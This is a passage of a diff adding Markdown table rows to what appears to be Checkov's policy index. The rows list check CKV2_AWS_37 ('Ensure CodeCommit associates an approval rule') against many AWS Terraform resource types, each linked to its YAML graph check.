+| 1235 | CKV2_AWS_37              | resource                         | aws_lb_ssl_negotiation_policy                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1236 | CKV2_AWS_37              | resource                         | aws_lb_target_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1237 | CKV2_AWS_37              | resource                         | aws_lb_target_group_attachment                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1238 | CKV2_AWS_37              | resource                         | aws_licensemanager_association                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1239 | CKV2_AWS_37              | resource                         | aws_licensemanager_license_configuration                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1240 | CKV2_AWS_37              | resource                         | aws_lightsail_domain                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1241 | CKV2_AWS_37              | resource                         | aws_lightsail_instance                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1242 | CKV2_AWS_37              | resource                         | aws_lightsail_key_pair                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1243 | CKV2_AWS_37              | resource                         | aws_lightsail_static_ip                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1244 | CKV2_AWS_37              | resource                         | aws_lightsail_static_ip_attachment                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1245 | CKV2_AWS_37              | resource                         | aws_load_balancer_backend_server_policy                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1246 | CKV2_AWS_37              | resource                         | aws_load_balancer_listener_policy                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1247 | CKV2_AWS_37              | resource                         | aws_load_balancer_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1248 | CKV2_AWS_37              | resource                         | aws_macie_member_account_association                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1249 | CKV2_AWS_37              | resource                         | aws_macie_s3_bucket_association                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1250 | CKV2_AWS_37              | resource                         | aws_main_route_table_association                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1251 | CKV2_AWS_37              | resource                         | aws_media_convert_queue                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1252 | CKV2_AWS_37              | resource                         | aws_media_package_channel                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1253 | CKV2_AWS_37              | resource                         | aws_media_store_container                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1254 | CKV2_AWS_37              | resource                         | aws_media_store_container_policy                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1255 | CKV2_AWS_37              | resource                         | aws_mq_broker                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1256 | CKV2_AWS_37              | resource                         | aws_mq_configuration                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1257 | CKV2_AWS_37              | resource                         | aws_msk_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1258 | CKV2_AWS_37              | resource                         | aws_msk_configuration                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1259 | CKV2_AWS_37              | resource                         | aws_nat_gateway                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1260 | CKV2_AWS_37              | resource                         | aws_neptune_cluster                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1261 | CKV2_AWS_37              | resource                         | aws_neptune_cluster_instance                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1262 | CKV2_AWS_37              | resource                         | aws_neptune_cluster_parameter_group                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1263 | CKV2_AWS_37              | resource                         | aws_neptune_cluster_snapshot                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1264 | CKV2_AWS_37              | resource                         | aws_neptune_event_subscription                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1265 | CKV2_AWS_37              | resource                         | aws_neptune_parameter_group                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1266 | CKV2_AWS_37              | resource                         | aws_neptune_subnet_group                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1267 | CKV2_AWS_37              | resource                         | aws_network_acl                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1268 | CKV2_AWS_37              | resource                         | aws_network_acl_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1269 | CKV2_AWS_37              | resource                         | aws_network_interface                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1270 | CKV2_AWS_37              | resource                         | aws_network_interface_attachment                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1271 | CKV2_AWS_37              | resource                         | aws_network_interface_sg_attachment                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1272 | CKV2_AWS_37              | resource                         | aws_opsworks_application                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1273 | CKV2_AWS_37              | resource                         | aws_opsworks_custom_layer                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1274 | CKV2_AWS_37              | resource                         | aws_opsworks_ganglia_layer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1275 | CKV2_AWS_37              | resource                         | aws_opsworks_haproxy_layer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1276 | CKV2_AWS_37              | resource                         | aws_opsworks_instance                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1277 | CKV2_AWS_37              | resource                         | aws_opsworks_java_app_layer                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1278 | CKV2_AWS_37              | resource                         | aws_opsworks_memcached_layer                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1279 | CKV2_AWS_37              | resource                         | aws_opsworks_mysql_layer                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1280 | CKV2_AWS_37              | resource                         | aws_opsworks_nodejs_app_layer                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1281 | CKV2_AWS_37              | resource                         | aws_opsworks_permission                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1282 | CKV2_AWS_37              | resource                         | aws_opsworks_php_app_layer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1283 | CKV2_AWS_37              | resource                         | aws_opsworks_rails_app_layer                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1284 | CKV2_AWS_37              | resource                         | aws_opsworks_rds_db_instance                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1285 | CKV2_AWS_37              | resource                         | aws_opsworks_stack                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1286 | CKV2_AWS_37              | resource                         | aws_opsworks_static_web_layer                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1287 | CKV2_AWS_37              | resource                         | aws_opsworks_user_profile                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1288 | CKV2_AWS_37              | resource                         | aws_organizations_account                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1289 | CKV2_AWS_37              | resource                         | aws_organizations_organization                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1290 | CKV2_AWS_37              | resource                         | aws_organizations_organizational_unit                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1291 | CKV2_AWS_37              | resource                         | aws_organizations_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1292 | CKV2_AWS_37              | resource                         | aws_organizations_policy_attachment                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1293 | CKV2_AWS_37              | resource                         | aws_pinpoint_adm_channel                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1294 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_channel                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1295 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_sandbox_channel                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1296 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_voip_channel                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1297 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_voip_sandbox_channel                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1298 | CKV2_AWS_37              | resource                         | aws_pinpoint_app                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1299 | CKV2_AWS_37              | resource                         | aws_pinpoint_baidu_channel                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1300 | CKV2_AWS_37              | resource                         | aws_pinpoint_email_channel                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1301 | CKV2_AWS_37              | resource                         | aws_pinpoint_event_stream                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1302 | CKV2_AWS_37              | resource                         | aws_pinpoint_gcm_channel                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1303 | CKV2_AWS_37              | resource                         | aws_pinpoint_sms_channel                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1304 | CKV2_AWS_37              | resource                         | aws_placement_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1305 | CKV2_AWS_37              | resource                         | aws_proxy_protocol_policy                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1306 | CKV2_AWS_37              | resource                         | aws_qldb_ledger                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1307 | CKV2_AWS_37              | resource                         | aws_quicksight_group                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1308 | CKV2_AWS_37              | resource                         | aws_quicksight_user                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1309 | CKV2_AWS_37              | resource                         | aws_ram_principal_association                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1310 | CKV2_AWS_37              | resource                         | aws_ram_resource_association                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1311 | CKV2_AWS_37              | resource                         | aws_ram_resource_share                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1312 | CKV2_AWS_37              | resource                         | aws_ram_resource_share_accepter                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1313 | CKV2_AWS_37              | resource                         | aws_rds_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1314 | CKV2_AWS_37              | resource                         | aws_rds_cluster_endpoint                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1315 | CKV2_AWS_37              | resource                         | aws_rds_cluster_instance                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1316 | CKV2_AWS_37              | resource                         | aws_rds_cluster_parameter_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1317 | CKV2_AWS_37              | resource                         | aws_rds_global_cluster                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1318 | CKV2_AWS_37              | resource                         | aws_redshift_cluster                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1319 | CKV2_AWS_37              | resource                         | aws_redshift_event_subscription                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1320 | CKV2_AWS_37              | resource                         | aws_redshift_parameter_group                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1321 | CKV2_AWS_37              | resource                         | aws_redshift_security_group                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1322 | CKV2_AWS_37              | resource                         | aws_redshift_snapshot_copy_grant                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1323 | CKV2_AWS_37              | resource                         | aws_redshift_snapshot_schedule                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1324 | CKV2_AWS_37              | resource                         | aws_redshift_snapshot_schedule_association                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
